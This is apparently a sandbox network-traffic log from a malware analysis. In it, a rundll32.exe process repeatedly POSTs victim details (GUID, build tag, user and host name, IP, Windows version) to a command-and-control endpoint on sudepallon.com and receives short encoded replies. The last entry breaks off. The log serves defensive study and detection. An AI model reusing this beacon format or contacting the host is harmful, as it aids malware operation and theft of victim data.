                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:44.109110117 CEST293OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:44.176737070 CEST293INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:45 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 43 4b 50 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cCKPXARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        50192.168.2.224921577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:02.096319914 CEST350OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:02.164352894 CEST350INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:03 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 43 4b 50 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cCKPXARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        51192.168.2.224921677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:02.443327904 CEST351OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:02.509047031 CEST351INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:04 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4a 54 47 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cJTGQARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        52192.168.2.224921777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:02.795839071 CEST352OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:02.861690044 CEST352INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:04 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 51 4d 4e 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cQMNJARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        53192.168.2.224921877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:03.144898891 CEST353OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:03.211303949 CEST354INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:04 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4a 48 53 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cJHSQARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        54192.168.2.224921977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:03.508997917 CEST354OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:03.576344967 CEST355INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:05 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 5a 54 47 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cZTGAARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        55192.168.2.224922077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:03.856873035 CEST356OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:03.922349930 CEST356INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:05 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 59 48 53 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cYHSBARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        56192.168.2.224922177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:04.197191954 CEST357OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:04.262307882 CEST357INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:05 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 54 59 42 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cTYBGARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        57192.168.2.224922277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:04.546376944 CEST358OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:04.616350889 CEST358INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:06 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 42 56 45 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cBVEYARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        58192.168.2.224922377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:04.905638933 CEST359OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:04.970766068 CEST359INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:06 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 41 5a 41 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cAZAZARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        59192.168.2.224922477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:05.247622013 CEST360OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:05.315228939 CEST360INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:06 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4e 59 42 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cNYBMARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        6192.168.2.224917177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:44.459810019 CEST294OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:44.530076981 CEST295INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:46 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 46 5a 41 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cFZAUARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        60192.168.2.224922577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:05.589504957 CEST361OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:05.662805080 CEST361INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:07 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 48 4e 4d 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cHNMSARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        61192.168.2.224922677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:05.956391096 CEST362OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:06.025240898 CEST363INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:07 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 42 43 58 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cBCXYARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        62192.168.2.224922777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:06.306303024 CEST363OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:06.374591112 CEST364INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:07 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 43 59 42 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cCYBXARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        63192.168.2.224922877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:06.653908968 CEST365OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:06.722950935 CEST365INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:08 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4a 41 5a 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cJAZQARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        64192.168.2.224922977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:07.010056019 CEST366OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:07.077636003 CEST366INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:08 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4e 42 59 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cNBYMARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        65192.168.2.224923077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:07.349283934 CEST367OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
